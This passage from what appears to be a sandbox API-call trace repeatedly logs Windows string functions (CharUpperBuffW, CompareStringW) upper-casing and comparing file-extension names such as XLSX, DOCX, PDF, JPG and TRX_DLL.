lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLS", cchCount1=3, lpString2="XLSX", cchCount2=4) returned 1 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="XLS", cchCount2=3) returned 1 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLSX", cchCount1=4, lpString2="XLS", cchCount2=3) returned 3 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLS", cchCount1=3, lpString2="XLS", cchCount2=3) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLS", cchCount1=3, lpString2="XLS", cchCount2=3) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="XLS", cchCount2=3) returned 1 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="DOCX", cchCount2=4) returned 3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="DOCX", cchCount2=4) returned 3 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOCX", cchCount2=4) returned 1 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="DOC", cchCount2=3) returned 3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="DOC", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="DOC", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="ODS", cchCount2=3) returned 3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="ODS", cchCount2=3) returned 1 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="ODS", cchCount2=3) returned 1 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODT", cchCount1=3, lpString2="ODS", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="ODT", cchCount2=3) returned 1 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="ODT", cchCount2=3) returned 3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="ODT", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODT", cchCount1=3, lpString2="ODT", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODT", cchCount1=3, lpString2="ODT", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PDF", cchCount1=3, lpString2="ODT", cchCount2=3) returned 3 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="PDF", cchCount2=3) returned 1 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="PDF", cchCount2=3) returned 3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="PDF", cchCount2=3) returned 3 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PDF", cchCount1=3, lpString2="PDF", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PDF", cchCount1=3, lpString2="PDF", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="PDF", cchCount2=3) returned 1 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="JPG", cchCount2=3) returned 3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="JPG", cchCount2=3) returned 1 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="JPG", cchCount2=3) returned 3 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="acrodata", cchLength=0x8 | out: lpsz="ACRODATA") returned 0x8 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ACRODATA", cchCount1=8, lpString2="JPG", cchCount2=3) returned 1 [0111.574] CharUpperBuffW (in: lpsz="acrodata", cchLength=0x8 | out: lpsz="ACRODATA") returned 0x8 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PDF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="GRL", cchLength=0x3 | out: lpsz="GRL") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="GRL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CharUpperBuffW (in: lpsz="GRL", cchLength=0x3 | out: lpsz="GRL") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="GRL", cchCount2=3) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="GRL", cchCount2=3) returned 1 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="GRL", cchCount2=3) returned 3 [0111.575] CharUpperBuffW (in: lpsz="GRL", cchLength=0x3 | out: lpsz="GRL") returned 0x3 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="GRL", cchCount1=3, lpString2="GRL", cchCount2=3) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="GRL", cchCount2=3) returned 3 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNG", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 3 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 